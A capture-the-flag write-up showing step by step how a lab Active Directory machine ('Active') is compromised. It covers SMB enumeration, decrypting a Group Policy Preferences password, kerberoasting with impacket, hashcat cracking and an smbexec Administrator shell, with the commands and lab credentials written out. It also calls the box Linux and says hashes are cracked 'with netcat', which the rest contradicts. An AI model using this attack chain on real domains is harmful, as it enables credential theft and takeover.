Summary

Active is an easy linux box that can be exploited by enumerating the SMB service and finding a hash in one of the files. This can be decrypted resulting in valid credentials that can be used to enumerate SMB again but this time from an authenticated perspective. Then you can apply kerberoasting to obtain the Administrator hashes which can be cracked with netcat. By using smbexec.py from impacket you will obtain a semi-interactive shell.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn [ip]
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49165/tcp open  unknown

This strongly suggests an active directory installation. Further nmap scans confirm this:

389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)

SMB Enumeration

It’s also known that OS is: Windows Server 2008 R2 SP1. Let’s start by enumerating SMB. You can use this to recursively download the smb directories. I always search for keywords such as user and pass first:

grep -i -r "pass"
Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml:

It found a pass match in this file for the user SVC_TGS. When you carefully look at the filename, it shows it’s stored in group preferences. When you google for that you will find that you can crack these GPP (Group Policy Preferences) with gpp-decrypt:

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPPstillStandingStrong2k18

Nice, with these new credentials you should go back to SMB and enumerate as an authenticated user:

smbmap -H 10.129.107.170 -u SVC_TGS -p GPPstillStandingStrong2k18
[+] IP: 10.129.107.170:445	Name: 10.129.107.170                                    
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY

Now you can read other shares. Use smbclient for this:

smbclient \\\\10.129.107.170\\Users -U SVC_TGS%GPPstillStandingStrong2k18

Now you can get the user.txt with:

smb: \SVC_TGS\Desktop\> mget user.txt

As a side note, to enumerate users from AD you can use GetADUsers.py from impacket. To enumerate domain users:

jeroen@kali:~$ /opt/impacket/build/scripts-3.9/GetADUsers.py -all active.htb/SVC_TGS -dc-ip 10.129.107.170
Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation

Password:
[*] Querying 10.129.107.170 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2018-07-18 21:06:40.351723  2021-01-22 09:42:30.615553 
Guest                                                                            
krbtgt                                                2018-07-18 20:50:36.972031               
SVC_TGS                                               2018-07-18 22:14:38.402764  2018-07-21 16:01:30.320277

Privilege Escalation

Kerberos authentication uses Service Principal Names (SPNs) to identify the account associated with a particular service instance. This can be done with impacket’s GetUserSPNs.py:

$ /opt/impacket/build/scripts-3.9/GetUserSPNs.py -request -dc-ip 10.129.100.89 active.htb/SVC_TGS


$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$d5014bfdf8ab0b63e886d[...]

This will give you the hashes. These can be cracked with hashcat. First you have ot look up the hash type at: https://hashcat.net/wiki/doku.php?id=example_hashes Then you can crack them as follows:

hashcat -a 0 -m 13100 GetUserSPNs.out /usr/share/wordlists/rockyou.txt -o cracked.txt

This will give the password: Ticketmaster1968. Now that you have credentials for windows, you can authenticate with smbexec.py:

python3 /opt/impacket/examples/smbexec.py Administrator:Ticketmaster1968@10.129.100.89

To get the root flag, run:

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt

Conclusion

This was a really fun and easy box, I really enjoyed it. Learned some new stuff such as the Group Policy Preferences and I didn’t know about impacket’s smbexec.py yet so that’s useful. Hope you enjoyed the writeup!